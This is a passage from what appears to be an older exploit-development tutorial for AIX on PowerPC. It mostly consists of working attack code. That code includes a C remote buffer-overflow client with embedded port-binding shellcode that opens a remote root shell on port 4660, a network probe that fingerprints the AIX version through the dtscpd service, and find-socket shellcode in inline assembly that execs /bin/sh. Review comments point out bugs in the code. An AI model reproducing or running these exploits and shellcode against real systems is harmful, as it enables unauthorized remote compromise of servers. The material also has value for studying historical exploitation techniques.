1. It is easy to write the attack program once the overflow buffer size and the return address are known.
  2.  
  3. /* client.c - remote overflow demo
  4. *
  5. * 2004.06.16
  6. * san@nsfocus.com
  7. */
  8.  
  9. #include <stdio.h>
  10. #include <string.h>
  11. #include <stdlib.h>
  12. #include <unistd.h>
  13. #include <ctype.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <sys/ioctl.h>
  17. #include <sys/time.h>
  18. #include <netdb.h>
  19. #include <netinet/in.h>
  20. #include <arpa/inet.h>
  21. #include <errno.h>
  22.  
  23. // It needs adjust.
  24. #define RET 0x2ff22d88;
  25.  
  26. unsigned char sh_Buff[] =
  27. "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
  28. "\x40\x82\xff\xfd" /* bnel <syscallcode> */
  29. "\x7e\xa8\x02\xa6" /* mflr r21 */
  30. "\x3a\xc0\x01\xff" /* lil r22,0x1ff */
  31. "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
  32. "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
  33. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  34. "\x4e\x80\x04\x20" /* bctr */
  35.  
  36. "\x05\x82\x53\xa0" /* syscall numbers */
  37. "\x87\xa0\x01\x42" /* execve=0x05 close=0xa0 */
  38. "\x8d\x8c\x8b\x8a" /* socket=0x8d bind=0x8c */
  39. /* listen=0x8b naccept=0x8a */
  40. /* kfcntl=0x142 */
  41.  
  42. "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
  43. "\x44\xff\xff\x02" /* svca 0x0 */
  44. "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
  45.  
  46. "\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
  47. "\x41\x82\xff\xfd" /* beql <bindsckcode> */
  48. "\x7f\x08\x02\xa6" /* mflr r24 */
  49. "\x92\x98\xff\xfc" /* st r20,-4(r24) */
  50. "\x38\x76\xfe\x03" /* cal r3,-509(r22) */
  51. "\x38\x96\xfe\x02" /* cal r4,-510(r22) */
  52. "\x98\x78\xff\xf9" /* stb r3,-7(r24) */
  53. "\x7e\x85\xa3\x78" /* mr r5,r20 */
  54. "\x88\x55\xff\xfc" /* lbz r2,-4(r21) */
  55. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  56. "\x4e\x80\x04\x21" /* bctrl */
  57. "\x7c\x79\x1b\x78" /* mr r25,r3 */
  58. "\x38\x98\xff\xf8" /* cal r4,-8(r24) */
  59. "\x38\xb6\xfe\x11" /* cal r5,-495(r22) */
  60. "\x88\x55\xff\xfd" /* lbz r2,-3(r21) */
  61. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  62. "\x4e\x80\x04\x21" /* bctrl */
  63. "\x7f\x23\xcb\x78" /* mr r3,r25 */
  64. "\x38\x96\xfe\x06" /* cal r4,-506(r22) */
  65. "\x88\x55\xff\xfe" /* lbz r2,-2(r21) */
  66. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  67. "\x4e\x80\x04\x21" /* bctrl */
  68. "\x7f\x23\xcb\x78" /* mr r3,r25 */
  69. "\x7e\x84\xa3\x78" /* mr r4,r20 */
  70. "\x7e\x85\xa3\x78" /* mr r5,r20 */
  71. "\x88\x55\xff\xff" /* lbz r2,-1(r21) */
  72. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  73. "\x4e\x80\x04\x21" /* bctrl */
  74. "\x7c\x79\x1b\x78" /* mr r25,r3 */
  75. "\x3b\x56\xfe\x03" /* cal r26,-509(r22) */
  76. "\x7f\x43\xd3\x78" /* mr r3,r26 */
  77. "\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
  78. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  79. "\x4e\x80\x04\x21" /* bctrl */
  80. "\x7f\x23\xcb\x78" /* mr r3,r25 */
  81. "\x7e\x84\xa3\x78" /* mr r4,r20 */
  82. "\x7f\x45\xd3\x78" /* mr r5,r26 */
  83. "\xa0\x55\xff\xfa" /* lhz r2,-6(r21) */
  84. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  85. "\x4e\x80\x04\x21" /* bctrl */
  86. "\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
  87. "\x40\x80\xff\xd4" /* bge <bindsckcode+120> */
  88.  
  89. "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
  90. "\x40\x82\xff\xfd" /* bnel <shellcode> */
  91. "\x7f\xe8\x02\xa6" /* mflr r31 */
  92. "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
  93. "\x38\x7f\xff\x08" /* cal r3,-248(r31) */
  94. "\x38\x9f\xff\x10" /* cal r4,-240(r31) */
  95. "\x90\x7f\xff\x10" /* st r3,-240(r31) */
  96. "\x90\xbf\xff\x14" /* st r5,-236(r31) */
  97. "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
  98. "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
  99. "\x7e\xa9\x03\xa6" /* mtctr r21 */
  100. "\x4e\x80\x04\x20" /* bctr */
  101. "/bin/sh"
  102. ;
  103.  
  104. // ripped from isno
/*
 * Make_Connection - open a TCP connection to address:port, waiting at
 * most `timeout` seconds for it to complete.
 *
 * The socket is switched to non-blocking mode so connect() returns at
 * once; select() then waits for writability, and SO_ERROR is queried to
 * learn whether the connection really succeeded. Blocking mode is
 * restored before returning.
 *
 * address: IPv4 address in dotted-quad form (inet_addr(); no name lookup).
 * port:    TCP port in host byte order.
 * timeout: seconds to wait for the connection to complete.
 *
 * Returns the connected socket (>= 0) on success, or a negative code:
 *   -1 socket() failed
 *   -2 address rejected (see the note at that check)
 *   -3 select() failed
 *   -4 timed out
 *   -5 the connection failed (SO_ERROR non-zero)
 * Callers must test for a negative result; `!s` does not detect failure.
 */
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
int s,i,bf;
fd_set wd;
struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
/* NOTE(review): inet_addr() reports a parse failure as INADDR_NONE
 * (all bits set), not 0, so this only rejects "0.0.0.0"; an unparseable
 * address falls through and the connect fails later with -4 or -5. */
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
/* non-blocking, so connect() returns immediately (its return value,
 * normally -1/EINPROGRESS here, is deliberately not checked) */
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
/* writability means the connect attempt has finished, successfully or not */
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
/* SO_ERROR distinguishes a completed connect from a failed one.
 * NOTE(review): getsockopt() takes a socklen_t *; passing &i (an int)
 * relies on int and socklen_t having the same size and representation. */
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
return -5;
}
/* bf is 0 at this point, so this ioctl clears FIONBIO (blocking mode again) */
ioctl(s,FIONBIO,&bf);
return s;
}
  151.  
  152. /* ripped from TESO code */
/*
 * shell - relay bytes between the local terminal and a connected socket.
 *
 * Loops forever: select() waits until stdin (fd 0) or `sock` is readable,
 * then whatever is read from one side is written to the other. EOF or a
 * read error on either side terminates the whole process via exit().
 *
 * sock: a connected, blocking socket descriptor.
 *
 * NOTE(review): rfds is never cleared with FD_ZERO, so it starts with
 * indeterminate contents and keeps stale bits between iterations; the
 * select() and write() return values are unchecked, and a short write
 * silently drops data.
 */
void shell (int sock)
{
int l;
char buf[512];
fd_set rfds;

while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);

/* blocks until at least one side has data (no timeout) */
select (sock + 1, &rfds, NULL, NULL, NULL);

/* terminal -> socket */
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}

/* socket -> terminal */
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l <= 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
  184.  
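/*
 * PrintSc - dump a byte buffer to stderr as a C string literal.
 *
 * Output: a comment header giving the byte count, then every byte as a
 * "\xNN" escape in lowercase hex, four bytes per quoted line, closed by
 * a quote and semicolon so the text can be pasted into a source file.
 *
 * lpBuff:   bytes to print; must be readable for at least buffsize bytes.
 * buffsize: number of bytes to print. Values <= 0 print only the header
 *           and the closing quote.
 *
 * Fixed versus the original: each byte used to be formatted with sprintf()
 * into a 4-byte array, but "\xNN" plus its terminator needs 5 bytes, so
 * every byte overflowed that stack buffer by one. The original also relied
 * on the non-standard _tolower() macro. Printing with "%02x" yields the
 * same lowercase text with no intermediate buffer at all.
 */
void PrintSc(unsigned char *lpBuff, int buffsize)
{
    fprintf(stderr, "/* %d bytes */\n", buffsize);
    for (int i = 0; i < buffsize; i++) {
        if (i % 4 == 0) {
            /* open the first quoted line, or close the previous line and open the next */
            fprintf(stderr, i == 0 ? "\"" : "\"\n\"");
        }
        /* %02x is already lowercase, matching the old per-character lowering */
        fprintf(stderr, "\\x%02x", (unsigned)lpBuff[i] & 0xffu);
    }
    fprintf(stderr, "\";\n");
}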
  209.  
/*
 * Entry point. argv[1] is the target IPv4 address, argv[2] the target port.
 *
 * Builds one fixed-size 1024-byte buffer, sends it over a first TCP
 * connection, sleeps one second, then opens a second connection to port
 * 4660 on the same host and hands that socket to shell().
 *
 * NOTE(review): Make_Connection() reports failure with a negative value,
 * so the `if (!s)` and `if (!k)` checks never fire; a failed connect falls
 * through to send() / shell() on an invalid descriptor.
 * NOTE(review): Buff is walked as an array of unsigned long, so the word
 * fills below assume a 32-bit long; on an LP64 build each store would
 * cover 8 bytes instead of 4.
 * Falls off the end without a return statement (implicit 0 under C99+).
 */
int main(int argc, char *argv[]) {
unsigned char Buff[1024];

unsigned long *ps;
int s, i, k;

if (argc < 3) {
fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
return -1;
}

s = Make_Connection(argv[1], atoi(argv[2]), 10);
if (!s) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}

/* fill the whole buffer, one 32-bit word at a time, with 0x60000000
 * (i is int, sizeof(Buff)/4 is size_t: sign-compare warning) */
ps = (unsigned long *)Buff;
for(i=0; i<sizeof(Buff)/4; i++)
{
*(ps++) = 0x60000000;
}

/* place sh_Buff at the end of Buff; subtracting sizeof(sh_Buff) % 4 as well
 * keeps its start on a 4-byte boundary */
i = sizeof(sh_Buff) % 4;

memcpy(&Buff[sizeof(Buff) - sizeof(sh_Buff) - i], sh_Buff, sizeof(sh_Buff));

/* the first 92 bytes (23 words) are overwritten with RET */
ps = (unsigned long *)Buff;
for(i=0; i<92/4; i++)
{
*(ps++) = RET;
}
/* NUL-terminate so the buffer is a valid C string for the receiver */
Buff[sizeof(Buff) - 1] = 0;

//PrintSc(Buff, sizeof(Buff));

/* sizeof(Buff) is always sent; a short send() (i > 0 but < 1024) is not detected */
i = send(s, Buff, sizeof(Buff), 0);
if (i <= 0) {
fprintf(stderr, "[-] Send failed. \n");
return -1;
}

sleep (1);

k = Make_Connection(argv[1], 4660, 10);
if (!k) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}

shell(k);

}
  263.  
264. The attack program is easy, but the syscall numbers differ between AIX versions. In a local exploit you can run `oslevel -r` to determine the AIX version and then fill in the corresponding syscall numbers; that is not possible in a remote exploit. If the remote server provides the dtscpd service (port 6112), we can send the following data to it:
  265.  
  266. char peer0_0[] = {
  267. 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32,
  268. 0x30, 0x34, 0x30, 0x30, 0x30, 0x64, 0x30, 0x30,
  269. 0x30, 0x31, 0x20, 0x20, 0x34, 0x20, 0x00, 0x72,
  270. 0x6f, 0x6f, 0x74, 0x00, 0x00, 0x31, 0x30, 0x00,
  271. 0x00 };
  272.  
273. On my box the dtscpd service returns the following information about the system:
  274.  
  275. aix5:AIX:1:001381144C00
  276.  
277. So the AIX version can be obtained remotely, and the corresponding syscall numbers can then be written into the shellcode by the remote exploit.
  278.  
  279. --[ 8 - Find socket shellcode
  280.  
281. In a network protected by a firewall, port-binding shellcode cannot be reached and connect-back shellcode cannot reach out. However, the socket of the attacking connection itself can be reused.
  282.  
283. LSD provides a way to find the socket with getpeername, but there is a problem: in a NAT environment the port sent by the attacker will not match the one seen by the server. In addition, bkbll once referred to another easy way, OOB. Out-of-band data is not blocked in the Berkeley socket implementation.
  284.  
285. The following code shows how this shellcode is implemented on AIX 5.1:
  286.  
  287.  
  288. void ShellCode()
  289. {
  290. asm \
  291. (" \
  292. Start: ;\
  293. xor. %r20, %r20, %r20 ;\
  294. bnel Start ;\
  295. mflr %r21 ;\
  296. addi %r21, %r21, 12 ;\
  297. b Loop ;\
  298. crorc %cr6, %cr6, %cr6 ;\
  299. svca 0 ;\
  300. \
  301. Loop: ;\
  302. li %r2, 0x81 ;\
  303. mr %r3, %r20 ;\
  304. addi %r4, %r21, -40 ;\
  305. li %r5, 1 ;\
  306. li %r6, 1 ;\
  307. mtctr %r21 ;\
  308. bctrl ;\
  309. \
  310. lbz %r4, -40(%r21) ;\
  311. cmpi %cr0, %r4, 0x49 ;\
  312. beq Found ;\
  313. addi %r20, %r20, 1 ;\
  314. b Loop ;\
  315. \
  316. Found: ;\
  317. li %r22, 2 ;\
  318. \
  319. DupHandle: ;\
  320. li %r2, 0xa0 ;\
  321. mr %r3, %r22 ;\
  322. mtctr %r21 ;\
  323. bctrl ;\
  324. \
  325. li %r2, 0x142 ;\
  326. mr %r3, %r20 ;\
  327. li %r4, 0 ;\
  328. mr %r5, %r22 ;\
  329. mtctr %r21 ;\
  330. bctrl ;\
  331. \
  332. addic. %r22, %r22, -1 ;\
  333. bge DupHandle ;\
  334. \
  335. addi %r3, %r21, 140 ;\
  336. stw %r3, -8(%r1) ;\
  337. li %r5, 0 ;\
  338. stw %r5, -4(%r1) ;\
  339. subi %r4, %r1, 8 ;\
  340. li %r2, 5 ;\
  341. crorc %cr6, %cr6, %cr6 ;\
  342. svca 0 ;\
  343. .byte '/', 'b', 'i', 'n', \
  344. '/', 's', 'h', 0x0 ;\
  345. ");
  346. }
  347.  
348. Other AIX versions need the corresponding syscall numbers changed.
  349.  
350. I gave a presentation on find-socket shellcode at Xcon 2004, covering the various approaches on various operating systems.
  351.  
  352. --[ 9 - Reference
  353.  
  354. [1] UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes
  355. http://lsd-pl.net/unix_assembly.html
  356. [2] PowerPC / OS X (Darwin) Shellcode Assembly - B-r00t
  357. [3] Assembler Language Reference
  358. http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/alangreftfrm.htm
  359. [4] PowerPC Microprocessor Family: The Programming Environments for 32-Bit Microprocessors
  360. http://www-3.ibm.com/chips/techlib/techlib.nsf/techdocs/852569B20050FF778525699600719DF2/$file/6xx_pem.pdf
  361. [5] OPTIMIZING PowerPC CODE - Gary Kacmarcik
  362. [6] PowerPC assembly
  363. http://www-900.ibm.com/developerWorks/cn/linux/hardware/ppc/assembly/index_eng.shtml
  364. [7] A developer's guide to the PowerPC architecture
  365. http://www-900.ibm.com/developerWorks/cn/linux/l-powarch/index_eng.shtml
  366. [8] [Tips]AIX (PPC)??exploite 1?
  367. https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28177
  368. [9] http://aixpdslib.seas.ucla.edu/
  369. [10] 64-bit PowerPC ELF Application Binary Interface Supplement 1.7
  370. http://www.linuxbase.org/spec/ELF/ppc64/spec/book1.html
  371. [11] Mach-O Runtime Conventions for PowerPC
  372. http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/2rt_powerpc_abi/chapter_9_section_1.html
  373. [12] Programmer's Introduction to PowerPC
  374. http://physinfo-mac0.ulb.ac.be/divers_html/PowerPC_Programming_Info/intro_to_ppc/ppc0_index.html
  375. [13] http://www.honeynet.org/scans/scan28/